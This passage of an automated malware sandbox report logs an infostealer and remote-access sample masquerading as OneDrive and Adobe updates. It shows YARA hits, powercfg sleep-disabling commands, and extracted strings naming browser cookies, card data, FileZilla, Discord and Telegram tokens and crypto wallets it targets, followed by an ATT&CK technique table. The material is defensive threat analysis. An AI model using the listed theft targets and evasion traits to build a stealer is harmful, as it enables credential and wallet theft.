                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeCode function: 1_2_00007FF6C12AD8CC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00007FF6C12AD8CC
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000000.00000002.2198132330.000000000A0C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Aurora.exe PID: 6256, type: MEMORYSTR
                      Source: Yara matchFile source: 7.2.OneDrive.exe.43d6b80.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.OneDrive.exe.46f41b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.OneDrive.exe.46f41b0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.OneDrive.exe.43d6b80.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001F.00000002.1804400683.000000000466E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1727999189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.1824795418.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2933944946.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.2092621986.0000000002E4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.1905772220.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000037.00000002.2078076863.0000000002C6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.1787802985.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000037.00000002.2085170193.00000000048DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1798111902.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: OneDrive.exe PID: 6972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: OneDrive Updater.exe PID: 7736, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7880, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: OneDrive Updater.exe PID: 8124, type: MEMORYSTR
                      Source: Yara matchFile source: 4.0.build.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: build.exe PID: 6332, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, type: DROPPED
                      Source: build.exe, 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                      Source: build.exe, 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: build.exe, 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: build.exe, 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                      Source: OneDrive.exe, 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: PKCS12 key store MAC invalid - wrong password or corrupted file.[Org.BouncyCastle.Pkcs12.IgnoreUselessPasswordqpassword supplied for keystore that does not require one
                      Source: Yara matchFile source: 4.0.build.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: build.exe PID: 6332, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000000.00000002.2198132330.000000000A0C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Aurora.exe PID: 6256, type: MEMORYSTR
                      Source: Yara matchFile source: 7.2.OneDrive.exe.43d6b80.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.OneDrive.exe.46f41b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.OneDrive.exe.46f41b0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.OneDrive.exe.43d6b80.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001F.00000002.1804400683.000000000466E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1727999189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.1824795418.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2933944946.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.2092621986.0000000002E4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.1905772220.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000037.00000002.2078076863.0000000002C6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.1787802985.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000037.00000002.2085170193.00000000048DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1798111902.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: OneDrive.exe PID: 6972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: OneDrive Updater.exe PID: 7736, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7880, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: OneDrive Updater.exe PID: 8124, type: MEMORYSTR
                      Source: Yara matchFile source: 4.0.build.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: build.exe PID: 6332, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      Abuse Elevation Control Mechanism
                      1
                      Disable or Modify Tools
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Native API
                      1
                      Scheduled Task/Job
                      1
                      DLL Side-Loading
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory1
                      File and Directory Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      11
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Command and Scripting Interpreter
                      11
                      Registry Run Keys / Startup Folder
                      311
                      Process Injection
                      1
                      Abuse Elevation Control Mechanism
                      Security Account Manager25
                      System Information Discovery
                      SMB/Windows Admin Shares3
                      Clipboard Data
                      2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Scheduled Task/Job
                      1
                      Services File Permissions Weakness
                      1
                      Scheduled Task/Job
                      21
                      Obfuscated Files or Information
                      NTDS641
                      Security Software Discovery
                      Distributed Component Object ModelInput Capture12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts1
                      PowerShell
                      Network Logon Script11
                      Registry Run Keys / Startup Folder
                      1
                      Software Packing
                      LSA Secrets1
                      Process Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                      Services File Permissions Weakness
                      1
                      Timestomp
                      Cached Domain Credentials361
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Masquerading
                      Proc Filesystem1
                      Remote System Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt361
                      Virtualization/Sandbox Evasion
                      /etc/passwd and /etc/shadow1
                      System Network Configuration Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                      Process Injection
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                      Hidden Files and Directories
                      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
